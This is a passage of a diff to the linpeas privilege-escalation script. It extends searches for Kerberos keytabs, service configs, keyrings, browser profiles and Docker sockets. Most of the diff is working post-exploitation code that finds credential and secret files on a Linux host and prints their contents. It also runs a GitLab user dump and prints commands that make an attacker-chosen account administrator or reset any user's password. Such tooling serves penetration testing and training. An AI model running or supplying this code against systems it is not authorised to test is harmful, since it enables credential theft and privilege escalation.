"$klist_exists" ]; then echo "klist execution"; klist; fi + + krb5=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'krb5\.conf|krb5.keytab|\.k5login') + printf "$krb5\n" | while read f; do + if [ -r "$f" ]; then + if [ "`echo \"$f\" | grep .k5login`" ]; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + elif [ "`echo \"$f\" | grep keytab`" ]; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + printf "`klist -k \"$f\" 2>/dev/null`\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && [ "`echo \"$l\" | grep \"@\"`" ]; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${C}[1;31m&${C}[0m,g" + #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif [ "`echo \"$f\" | grep krb5.conf`" ]; then + ls -l "$f" + cat "$f" 2>/dev/null | grep default_ccache_name | sed -${E} "s,default_ccache_name,${C}[1;31m&${C}[0m,"; + elif [ "`echo \"$f\" | grep kadm5.acl`" ]; then + ls -l "$f" + cat "$f" 2>/dev/null fi - done - else echo_not_found "krb5.conf" - fi + fi + done ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" klist 2>/dev/null || echo_not_found "klist" echo "" #-- SI) kibana printf $Y"[+] "$GREEN"Searching Kibana yaml\n"$NC - kibana=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'kibana\.y.*ml') + kibana=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'kibana\.y.*ml') if [ "$kibana" ]; then printf "$kibana\n" printf "$kibana\n" | while read f; do if [ -r "$f" ]; then - cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -v -e '^[[:space:]]*$' | sed -E "s,username|password|host|port|elasticsearch|ssl,${C}[1;31m&${C}[0m,"; + cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -v -e '^[[:space:]]*$' | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${C}[1;31m&${C}[0m,"; fi done else echo_not_found "kibana.yml" @@ -1975,14 +2164,14 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Knock printf $Y"[+] "$GREEN"Searching Knock configuration\n"$NC - Knock=$(echo "$FIND_ETC" | grep -E '/etc/init.d/.*knockd.*') + Knock=$(echo "$FIND_ETC\n$FIND_MNT" | grep -E '/etc/init.d/.*knockd.*') if [ "$Knock" ]; then printf "$Knock\n" | while read f; do h=$(grep -R -i "defaults_file=" $f | cut -b 15-) ##Search string to know where is the default knock file - example - DEFAULTS_FILE=/etc/default/knockd i=$(grep -R -i "please edit" $h | awk '{print $4}') ##Search string to know where is config file - example - # PLEASE EDIT /etc/knockd.conf BEFORE ENABLING j=$(grep -R -i "sequence" $i) ##If we want we can show sequence number - 'hidded' - printf "Config Knock file found!: \n$i\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," - printf " Sequence found!: \n$j\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," + printf "Config Knock file found!: \n$i\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + printf " Sequence found!: \n$j\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," done else echo_not_found "Knock.config" fi @@ -1990,16 +2179,16 @@ if [ "`echo $CHECKS | grep SofI`" ]; then ##-- SI) Logstash printf $Y"[+] "$GREEN"Searching logstash files\n"$NC - logstash=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'logstash') + logstash=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'logstash') if [ "$logstash" ]; then printf "$logstash\n" printf "$logstash\n" | while read d; do if [ -r "$d/startup.options" ]; then echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed -E "s,$USER,${C}[1;95m&${C}[0m," | sed -E "s,root,${C}[1;31m&${C}[0m," + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed -${E} "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,root,${C}[1;31m&${C}[0m," fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -E "s,exec\W*\{|command\W*=>,${C}[1;31m&${C}[0m," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -E"s,path\W*=>|code\W*=>|ruby\W*\{,${C}[1;31m&${C}[0m," + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${C}[1;31m&${C}[0m," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${C}[1;31m&${C}[0m," done else echo_not_found fi @@ -2007,7 +2196,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Elasticsearch printf $Y"[+] "$GREEN"Searching elasticsearch files\n"$NC - elasticsearch=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'elasticsearch\.y.*ml') + elasticsearch=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'elasticsearch\.y.*ml') if [ "$elasticsearch" ]; then printf "$elasticsearch\n" printf "$elasticsearch\n" | while read f; do @@ -2022,13 +2211,13 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Vault-ssh printf $Y"[+] "$GREEN"Searching Vault-ssh files\n"$NC - vaultssh=$(echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'vault-ssh-helper\.hcl') + vaultssh=$(echo "$FIND_ETC\n$FIND_USR\n$FIND_HOME\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'vault-ssh-helper\.hcl') if [ "$vaultssh" ]; then printf "$vaultssh\n" printf "$vaultssh\n" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" vault secrets list 2>/dev/null - echo "$FIND_ETC $FIND_USR $FIND_HOME $FIND_ROOT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '\.vault-token' | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + echo "$FIND_ETC\n$FIND_HOME\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '\.vault-token' | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null else echo_not_found "vault-ssh-helper.hcl" fi echo "" @@ -2047,30 +2236,30 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC screensess=`screen -ls 2>/dev/null` if [ "$screensess" ]; then - printf "$screensess" | sed -E "s,.*,${C}[1;31m&${C}[0m," | sed -E "s,No Sockets found.*,${C}[32m&${C}[0m," + printf "$screensess" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," else echo_not_found "screen" fi echo "" #-- SI) Tmux sessions tmuxdefsess=`tmux ls 2>/dev/null` - tmuxnondefsess=`ps aux | grep "tmux " | grep -v grep` + tmuxnondefsess=`ps auxwww | grep "tmux " | grep -v grep` printf $Y"[+] "$GREEN"Searching tmux sessions\n"$N printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then - printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -E "s,.*,${C}[1;31m&${C}[0m," | sed -E "s,no server running on.*,${C}[32m&${C}[0m," + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," else echo_not_found "tmux" fi echo "" #-- SI) Couchdb printf $Y"[+] "$GREEN"Searching Couchdb directory\n"$NC - couchdb_dirs=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'couchdb') + couchdb_dirs=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'couchdb') printf "$couchdb_dirs\n" | while read d; do for f in `find $d -name local.ini 2>/dev/null`; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^;" | grep -v "^$" | sed -E "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^;" | grep -v "^$" | sed -${E} "s,admin.*|password.*|cert_file.*|key_file.*|hashed.*|pbkdf2.*,${C}[1;31m&${C}[0m," 2>/dev/null fi done done @@ -2078,11 +2267,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Redis printf $Y"[+] "$GREEN"Searching redis.conf\n"$NC - redisconfs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'redis\.conf$') + redisconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'redis\.conf$') printf "$redisconfs\n" | while read f; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,masterauth.*|requirepass.*,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,masterauth.*|requirepass.*,${C}[1;31m&${C}[0m," 2>/dev/null fi done echo "" @@ -2098,103 +2287,318 @@ if [ "`echo $CHECKS | grep SofI`" ]; then df=$(echo $d |cut -d ':' -f1) dp=$(echo $d |cut -d ':' -f2-) echo "Found possible PLAIN text creds in $df" - echo "$dp" | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + echo "$dp" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null done fi echo "" #-- SI) Mosquitto printf $Y"[+] "$GREEN"Searching mosquitto.conf\n"$NC - mqttconfs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'mosquitto\.conf$') + mqttconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'mosquitto\.conf$') printf "$mqttconfs" | while read f; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${C}[1;31m&${C}[0m," 2>/dev/null fi done echo "" #-- SI) Neo4j printf $Y"[+] "$GREEN"Searching neo4j auth file\n"$NC - neo4j=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS" | grep -E 'neo4j') + neo4j=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'neo4j') printf "$neo4j\n" | while read d; do if [ -r "$d" ]; then echo "Found readable $d" - find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + find $d -type f -name "auth" -exec cat {} \; 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null fi done echo "" #-- SI) Cloud-Init printf $Y"[+] "$GREEN"Searching Cloud-Init conf file\n"$NC - cloudcfg=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'cloud\.cfg$') + cloudcfg=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'cloud\.cfg$') printf "$cloudcfg\n" | while read f; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | sed -E "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${C}[1;31m&${C}[0m," fi done echo "" ##-- SI) Erlang printf $Y"[+] "$GREEN"Searching Erlang cookie file\n"$NC - erlangcoo=$(echo "$FIND_ETC $FIND_HOME $FIND_ROOT $FIND_USR $FIND_VAR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.erlang.cookie$') + erlangcoo=$(echo "$FIND_ETC\n$FIND_HOME\n$FIND_USR\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '.erlang.cookie$') printf "$erlangcoo\n" | while read f; do if [ -r "$f" ]; then echo "Found Erlang cookie: $f" - cat "$f" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," fi done echo "" ##-- SI) GVM printf $Y"[+] "$GREEN"Searching GVM auth file\n"$NC - gvmconfs=$(echo "$FIND_HOME $FIND_ETC $FIND_ROOT $FIND_TMP $FIND_OTP $FIND_USR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'gvm-tools\.conf') + gvmconfs=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_TMP\n$FIND_OTP\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'gvm-tools\.conf') printf "$gvmconfs\n" | while read f; do if [ -r "$f" ]; then echo "Found GVM auth file: $f" - cat "$f" 2>/dev/null | sed -E "s,username.*|password.*,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed -${E} "s,username.*|password.*,${C}[1;31m&${C}[0m," fi done echo "" - IPSEC_RELEVANT_NAMES="ipsec.secrets ipsec.conf" - - ##-- SI) IPSEC printf $Y"[+] "$GREEN"Searching IPSEC files\n"$NC - ipsecconfs=$(echo "$FIND_HOME $FIND_ETC $FIND_ROOT $FIND_TMP $FIND_OTP $FIND_USR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'ipsec\.secrets|ipsec\.conf') + ipsecconfs=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_TMP\n$FIND_OTP\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'ipsec\.secrets|ipsec\.conf') printf "$ipsecconfs\n" | while read f; do if [ -r "$f" ]; then echo "Found IPSEC file: $f" - cat "$f" 2>/dev/null | sed -E "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${C}[1;31m&${C}[0m," fi done echo "" ##-- SI) IRSSI printf $Y"[+] "$GREEN"Searching IRSSI files\n"$NC - irssifols=$(echo "$FIND_VAR $FIND_HOME $FIND_ETC $FIND_ROOT $FIND_OTP $FIND_USR $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.irssi') + irssifols=$(echo "$FIND_DIR_VAR\n$FIND_DIR_HOME\n$FIND_DIR_ETC\n$FIND_DIR_OTP\n$FIND_DIR_USR\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E '.irssi') printf "$irssifols\n" | while read d; do if [ -r "$d/config" ]; then echo "Found IRSSI config file: $d/config" - cat "$d/config" 2>/dev/null | sed -E "s,password.*,${C}[1;31m&${C}[0m," + cat "$d/config" 2>/dev/null | sed -${E} "s,password.*,${C}[1;31m&${C}[0m," fi done echo "" ##-- SI) Keyring printf $Y"[+] "$GREEN"Searching Keyring files\n"$NC - keyringsfilesfolds=$(echo "$FIND_DIR_VAR $FIND_DIR_ETC $FIND_DIR_HOME $FIND_DIR_ROOT $FIND_DIR_TMP $FIND_DIR_USR $FIND_DIR_OPT $FIND_DIR_USERS $FIND_DIR_PRIVATE $FIND_DIR_APPLICATIONS $FIND_HOME $FIND_ETC $FIND_ROOT $FIND_VAR $FIND_USR $FIND_MNT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'keyrings|*\.keyring|*\.keystore') + keyringsfilesfolds=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_MNT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'keyrings|*\.keyring$|*\.keystore$') printf "$keyringsfilesfolds\n" | sort | uniq | while read f; do if [ -f "$f" ]; then echo "Keyring file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," elif [ -d "$f" ]; then echo "Keyring folder: $f" | sed "s,$f,${C}[1;31m&${C}[0m," - ls -lR "$f" 2>/dev/null | sed -E "s,keyrings|\.keyring|\.keystore,${C}[1;31m&${C}[0m," + ls -lR "$f" 2>/dev/null | sed -${E} "s,keyrings|\.keyring|\.keystore,${C}[1;31m&${C}[0m," fi done echo "" + + ##-- SI) Filezilla + printf $Y"[+] "$GREEN"Searching Filezilla sites file\n"$NC + filezillaconfs=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_OPT\n$FIND_DIR_MNT" | grep -E 'filelliza') + printf "$filezillaconfs\n" | uniq | while read f; do + if [ -d "$f" ]; then + echo "Found Filezilla folder: $f" + if [ -f "$f/sitemanager.xml" ]; then + cat "$f/sitemanager.xml" 2>/dev/null | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${C}[1;31m&${C}[0m," + fi + fi + done + echo "" + + ##-- SI) BACKUP-MANAGER + printf $Y"[+] "$GREEN"Searching backup-manager files\n"$NC + backupmanager=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_OPT\n$FIND_MNT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'storage.php|database.php') + printf "$backupmanager\n" | sort | uniq | while read f; do + if [ -f "$f" ]; then + echo "backup-manager file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${C}[1;31m&${C}[0m," + fi + done + echo "" + + ##-- SI) passwd files (splunk) + printf $Y"[+] "$GREEN"Searching uncommon passwd files (splunk)\n"$NC + splunkpwd=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -v "/etc/passwd$" | grep -E 'passwd$') + SPLUNK_BIN="`command -v splunk 2>/dev/null`" + if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${C}[1;31m&${C}[0m,"; fi + printf "$splunkpwd\n" | sort | uniq | while read f; do + if [ -f "$f" ] && ! [ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${C}[1;31m&${C}[0m," + fi + done + echo "" + + ##-- SI) Gitlab + printf $Y"[+] "$GREEN"Searching GitLab related files\n"$NC + #Check gitlab-rails + if [ "`command -v gitlab-rails`" ]; then + echo "gitlab-rails was found. Trying to dump users..." + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${C}[1;31m&${C}[0m," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" + fi + if [ "`command -v gitlab-backup`" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" + fi + #Check gitlab files + gitlabfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -v "/lib" | grep -E "secrets.yml$|gitlab.yml$|gitlab.rb$") + printf "$gitlabfiles\n" | sort | uniq | while read f; do + if [ "`echo $f | grep secrets.yml`" ]; then + echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" 2>/dev/null | grep -v "^$" | grep -v "^#" + elif [ "`echo $f | grep gitlab.yml`" ]; then + echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" | grep -A 4 "repositories:" + elif [ "`echo $f | grep gitlab.rb`" ]; then + echo "Found $f" | sed "s,$f,${C}[1;31m&${C}[0m," + cat "$f" | grep -v "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${C}[1;31m&${C}[0m," + fi + echo "" + done + echo "" + + ##-- SI) PGP/GPG + printf $Y"[+] "$GREEN"Searching PGP/GPG\n"$NC + pgpg=$(echo "$FIND_HOME\n$FIND_PRIVATE\n$FIND_MNT" | grep -E '\.pgp$|\.gpg$|.gnupg') + if [ "$pgpg" ]; then echo "PGP/GPG files found:" ; + printf "$pgpg\n" | sort | uniq | while read f; do + if [ -f "$f" ]; then + ls -l "$f" + else + ls -ld "$f" + ls -l "$f" 2>/dev/null + fi + done + echo "" + fi + echo "PGP/GPG software:" + command -v gpg 2>/dev/null || echo_not_found "gpg" + gpg --list-keys 2>/dev/null + command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" + netpgpkeys --list-keys 2>/dev/null + command -v netpgp 2>/dev/null || echo_not_found "netpgp" + echo "" + + ##-- SI) vi swp files + printf $Y"[+] "$GREEN"Searching vim files\n"$NC + vimfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E "\.swp$|\.viminfo$") + printf "$vimfiles\n" | sort | uniq | while read f; do + ls -l "$f" 2>/dev/null + done + echo "" + + ##-- SI) containerd installed + printf $Y"[+] "$GREEN"Checking if containerd(ctr) is available\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation\n"$NC + containerd=`command -v ctr` + if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + ctr image list + fi + echo "" + + ##-- SI) runc installed + printf $Y"[+] "$GREEN"Checking if runc is available\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation\n"$NC + runc=`command -v runc` + if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + fi + echo "" + + #-- SI) Docker + printf $Y"[+] "$GREEN"Searching docker files\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket\n"$NC + dockerfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_RUN\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'docker.socket|docker.sock|Dockerfile|docker-compose.yml') + printf "$dockerfiles\n" | while read f; do + ls -l "$f" 2>/dev/null + if [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + fi + done + echo "" + + #-- SI) Firefox files + printf $Y"[+] "$GREEN"Interesting Firefox Files\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/forensics/basic-forensics-esp/browser-artifacts#firefox\n"$NC + firefoxdirs=$(echo "$FIND_DIR_HOME" | grep -E '\.mozilla') + printf "$firefoxdirs\n" | while read f; do + if [ "$f" ]; then + echo "Found $f" + find "$f" -name "places.sqlite" -o -name "bookmarkbackups" -o -name "formhistory.sqlite" -o -name "handlers.json" -o -name "persdict.dat" -o -name "addons.json" -o -name "cookies.sqlite" -o -name "cache2" -o -name "startupCache" -o -name "favicons.sqlite" -o -name "prefs.js" -o -name "downloads.sqlite" -o -name "thumbnails" -o -name "logins.json" -o -name "key4.db" -o -name "key3.db" 2>/dev/null | sort + fi + done + echo "" + + #-- SI) Chrome files + printf $Y"[+] "$GREEN"Interesting Chrome Files\n"$NC + printf 